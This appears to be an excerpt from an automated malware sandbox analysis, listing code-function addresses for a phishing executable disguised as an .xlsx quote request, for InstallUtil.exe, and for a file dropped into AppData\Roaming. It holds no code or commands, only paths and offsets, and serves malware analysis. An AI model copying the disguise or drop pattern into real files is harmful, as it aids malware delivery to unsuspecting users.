                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_031185400_2_03118540
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_03116DF70_2_03116DF7
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_03111C180_2_03111C18
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_057E142C0_2_057E142C
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_057ECCD80_2_057ECCD8
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_057E46200_2_057E4620
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_057EC05B0_2_057EC05B
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_057E00400_2_057E0040
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_057ECCCB0_2_057ECCCB
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_057EB7680_2_057EB768
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_057EB7580_2_057EB758
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_057E5F480_2_057E5F48
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_057E5F2A0_2_057E5F2A
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_057E2FB80_2_057E2FB8
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_057E2FA90_2_057E2FA9
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_057E46110_2_057E4611
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_057E00070_2_057E0007
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05ADC7100_2_05ADC710
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05AD89280_2_05AD8928
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05AD54F10_2_05AD54F1
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05AD00060_2_05AD0006
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05AD00400_2_05AD0040
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05AD93C90_2_05AD93C9
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05ADDCA80_2_05ADDCA8
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05AD89180_2_05AD8918
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05ADCA370_2_05ADCA37
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05AECF100_2_05AECF10
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05AEC2280_2_05AEC228
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05AE75580_2_05AE7558
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05AECEFF0_2_05AECEFF
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05AEC1900_2_05AEC190
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05AEE8A00_2_05AEE8A0
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05AEE8980_2_05AEE898
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05AEC2180_2_05AEC218
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B11D180_2_05B11D18
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B1CF680_2_05B1CF68
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B189880_2_05B18988
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B1F9500_2_05B1F950
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B14BE80_2_05B14BE8
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B11D080_2_05B11D08
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B13C400_2_05B13C40
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B189780_2_05B18978
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B1F9400_2_05B1F940
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B1D8F90_2_05B1D8F9
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B14BD80_2_05B14BD8
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B14B410_2_05B14B41
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B1DA320_2_05B1DA32
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05E014380_2_05E01438
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05E063400_2_05E06340
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05E063310_2_05E06331
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05E000400_2_05E00040
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05E000350_2_05E00035
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05E0121D0_2_05E0121D
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05E3E0480_2_05E3E048
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05E200400_2_05E20040
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05E200070_2_05E20007
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05E3D3D80_2_05E3D3D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105C1472_2_0105C147
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_010553702_2_01055370
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105D2782_2_0105D278
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105C4722_2_0105C472
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105C7382_2_0105C738
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105E9882_2_0105E988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_010569A02_2_010569A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105CA082_2_0105CA08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01059DE02_2_01059DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105CCD82_2_0105CCD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105CFAA2_2_0105CFAA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01056FC82_2_01056FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105F6392_2_0105F639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105E97A2_2_0105E97A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_010529E02_2_010529E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105FA902_2_0105FA90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06441E802_2_06441E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06440B302_2_06440B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_064417A02_2_064417A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06449C702_2_06449C70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_064450282_2_06445028
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_064495482_2_06449548
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_064425682_2_06442568
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644E24A2_2_0644E24A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644E2582_2_0644E258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06441E702_2_06441E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644DE002_2_0644DE00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644EAF82_2_0644EAF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644E6AF2_2_0644E6AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644E6B02_2_0644E6B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644EF512_2_0644EF51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644EF602_2_0644EF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644EB082_2_0644EB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06440B202_2_06440B20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_064493282_2_06449328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644178F2_2_0644178F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06448B902_2_06448B90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06448BA02_2_06448BA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644F3B82_2_0644F3B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_064400402_2_06440040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644FC582_2_0644FC58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06449C6D2_2_06449C6D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644FC682_2_0644FC68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_064400062_2_06440006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644F8022_2_0644F802
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644F8102_2_0644F810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_064450182_2_06445018
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644D0F82_2_0644D0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644CCA02_2_0644CCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644D5402_2_0644D540
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644D5502_2_0644D550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644DDFF2_2_0644DDFF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644D9992_2_0644D999
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644D9A82_2_0644D9A8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_016969783_2_01696978
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_0169C8F83_2_0169C8F8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_01691BA83_2_01691BA8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_01694E283_2_01694E28
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_016969683_2_01696968
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_016953F83_2_016953F8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_016985403_2_01698540
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_016985303_2_01698530
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_01698DEC3_2_01698DEC
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_01696DF73_2_01696DF7
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_01691C183_2_01691C18
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_01698F603_2_01698F60
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_01696E083_2_01696E08
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_01694E183_2_01694E18
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_033400483_2_03340048
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_0334000A3_2_0334000A
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A1CCD83_2_05A1CCD8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A1142C3_2_05A1142C
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A146203_2_05A14620
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A100403_2_05A10040
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A1C05B3_2_05A1C05B
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A1CCCA3_2_05A1CCCA
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A12FA93_2_05A12FA9
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A12FB83_2_05A12FB8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A15F2A3_2_05A15F2A
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A1B7683_2_05A1B768
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A15F483_2_05A15F48
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A1B7583_2_05A1B758
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A146113_2_05A14611
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A100063_2_05A10006
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B0C7103_2_05B0C710
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B089283_2_05B08928
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B054F13_2_05B054F1
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B000063_2_05B00006
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B000403_2_05B00040
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B093C93_2_05B093C9
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B0DD083_2_05B0DD08
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B089183_2_05B08918
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B0CA373_2_05B0CA37
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B1CF103_2_05B1CF10
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B173183_2_05B17318
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B1C2283_2_05B1C228
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B1CEFF3_2_05B1CEFF
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B1E8A03_2_05B1E8A0
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B1E8983_2_05B1E898
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B1C2183_2_05B1C218
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B41D183_2_05B41D18
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B4CF683_2_05B4CF68
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B489883_2_05B48988
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B44BE83_2_05B44BE8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B41D083_2_05B41D08
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B43C403_2_05B43C40
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B4F9703_2_05B4F970
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B489783_2_05B48978
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B4F9613_2_05B4F961
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B4D8F93_2_05B4D8F9
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B44BD83_2_05B44BD8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B4DA323_2_05B4DA32
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05BE00063_2_05BE0006
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05BE00403_2_05BE0040
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05CF08D83_2_05CF08D8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05CF08C93_2_05CF08C9
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05CF5BE93_2_05CF5BE9
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05CF5BF83_2_05CF5BF8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05E6E0483_2_05E6E048
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05E500403_2_05E50040
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05E500233_2_05E50023
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05E6D3D83_2_05E6D3D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5A0884_2_00B5A088
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5C1464_2_00B5C146
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5D2784_2_00B5D278
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B553624_2_00B55362
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5C4684_2_00B5C468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5C7384_2_00B5C738
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B569A04_2_00B569A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5E9884_2_00B5E988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B539ED4_2_00B539ED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5CA084_2_00B5CA08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5CCD84_2_00B5CCD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5CFA94_2_00B5CFA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B56FC84_2_00B56FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5F6314_2_00B5F631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B529EC4_2_00B529EC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5E97A4_2_00B5E97A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B5FA884_2_00B5FA88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00B53E094_2_00B53E09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B95484_2_054B9548
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B9C184_2_054B9C18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B50284_2_054B5028
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BE2584_2_054BE258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BD5404_2_054BD540
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BD5504_2_054BD550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BDDFF4_2_054BDDFF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BDDF14_2_054BDDF1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BFC5F4_2_054BFC5F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BFC684_2_054BFC68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BCC8F4_2_054BCC8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BCCA04_2_054BCCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BEF514_2_054BEF51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BEF604_2_054BEF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B178F4_2_054B178F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B17A04_2_054B17A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B1E704_2_054B1E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BDE004_2_054BDE00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B1E804_2_054B1E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BE6AF4_2_054BE6AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BE6A04_2_054BE6A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BE6B04_2_054BE6B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B295B4_2_054B295B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B29684_2_054B2968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BD9994_2_054BD999
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BD9A84_2_054BD9A8
